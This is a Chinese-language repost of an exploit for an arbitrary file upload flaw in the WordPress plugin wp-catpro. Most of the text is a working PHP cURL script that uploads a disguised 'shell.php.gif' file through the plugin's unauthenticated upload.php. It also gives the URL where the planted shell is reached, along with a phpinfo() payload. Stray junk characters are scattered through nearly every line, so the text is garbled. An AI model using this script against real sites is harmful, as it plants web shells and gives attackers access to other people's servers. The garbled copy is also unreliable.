WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
% s( g: l  d: e, S9 i#-----------------------------------------------------------------------

作者  => Zikou-16
8 `% O: k9 c3 M3 {邮箱 => zikou16x@gmail.com
7 Y" ~# r' E9 s$ C/ H$ s测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
- W7 }/ U! i. y- Z" J$ w####
& Z- A: K9 \. Z( v: y
' a! Y7 z7 X+ b4 `+ {. }#=> Exploit 信息:
/ O) U( Q4 [8 p------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
; \' O- v, H! x$ h1 L  Z! O# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
  C- Z! _- `$ G5 P8 P# R# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
5 y+ s$ Z0 b9 O( J0 x; R5 Y! ~; g- ^
1 D3 D' E, |3 F* F. H#=> Exploit
-----------
<?php
5 t" ^3 M- H/ F* C
0 M; I3 x6 o  f% S$ b. c" Z$uploadfile="zik.php.gif";
1 e' [1 ~6 W2 s& ?# J$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
1 M8 Q/ K6 i& Y3 S) X: Bcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
/ M. k7 }5 Y  D'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
7 P" x9 D1 j5 k2 }3 ]
print "$postResult";

3 u5 z' O9 u; N6 @- o6 e: MShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
" V3 D, o2 |& b2 H  ?>
<?php
phpinfo();
?>